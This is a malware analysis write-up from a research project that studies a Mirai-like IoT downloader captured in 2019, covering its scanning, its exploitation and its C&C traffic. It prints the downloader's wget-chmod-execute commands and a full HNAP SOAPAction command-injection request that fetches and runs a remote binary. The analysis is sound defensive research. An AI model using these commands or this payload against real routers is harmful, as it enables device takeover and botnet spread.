On February 28th, 2019 we infected one of our devices with the malware sample with SHA-256 4bd5dbf96fe7e695651b243b01fc86426d9214a832b7b7779f7ed56dcae13ead, the ID for this capture is 49-1. This malware is detected as a Mirai variant in most antivirus programs in VirusTotal as shown in the following image:
However, the malware is a shell code that downloads and runs different binary files, suggesting that it is more of a downloader than a specific malware. The bash script is very long and it starts with these lines:
/bin/bash cd /tmp cd /var/run cd /mnt cd /root wget http://18.104.22.168/mips chmod x mips ./mips rm -rf mips cd /tmp cd /var/run
All the files are being downloaded from 22.214.171.124 that is an IP address from Digital Ocean in US related with a lot of malware downloads. This IP had more than 11 malware files downloaded from IP, but only this bash scrip as communicating file. Given that only the current bash script seems to communicate with this IP, and given that the first time this IP address was detected in VirusTotal was the same day we executed, we may conclude that this IP address was only used for this malware alone. That seems like a lot of resources spent in only one malware sample.
The bash script download and executes the binaries one by one until one works. In our case it was the binary called armv7l.
The binary that was executed has sha256 b71505e6b4734f4f96a636c23a80c8c9050594b04f7bba6bbd5bd23e457310f4, and its a ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped.
This binary starts by port scanning IP addresses in the Internet on port 8081/tcp. This is a sample of the traffic:
This scanning behavior seems to be weird because:
It uses the same source port for all its connections
The sequence number is reused for all the SYN
This port scan only found 5 IP addresses with this port open during the 8hs of the complete attack. Each of these IP were attacked.
When a server is found on port 8081, the malware attacks with the known HNAP vulnerability
The attack looks like this:
POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://126.96.36.199/mips && chmod +x mips && ./mips` Content-Length: 640 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi ="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap ="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <AddPortMapping xmlns="http://purenetworks.com/HNAP1/"> <PortMappingDescription>foobar</PortMappingDescription> <InternalClient>192.168.0.100</InternalClient> <PortMappingProtocol>TCP</PortMappingProtocol> <ExternalPort>1234</ExternalPort> <InternalPort>1234</InternalPort></AddPortMapping></soap:Body> </soap:Envelope>
This attack is designed to abuse a vulnerability called D-Link Devices - HNAP SOAPAction-Header Command Execution that even has a Metasploit module.
Command and Control
During the whole capture there is a connection to a C&C server on IP address 188.8.131.52 on port 4554/tcp. This IP, as we saw before, was specially obtained for this malware.
The communication of the C&C channel has some very nice properties. In particular each of its connections happens every 15 or 8 seconds, as it can be seen in the following time series graph for the first 100 connections.
The histogram of time between connections clearly shows this difference:
Most importantly the content of the C&C seems to be not encrypted, opening the door for a deeper analysis. The following image shows the content.
This malware is detected as Mirai, but we are not sure if it really is a variant of it. The C&C is unencrypted and has a very frequent connection to a new server in Digital Ocean.
The complete traffic of this capture can be found on https://mcfp.felk.cvut.cz/publicDatasets/IoTDatasets/CTU-IoT-Malware-Capture-49-1/
This research was done as part of our ongoing collaboration with Avast Software in the Aposemat project. The Aposemat project is funded by Avast Software.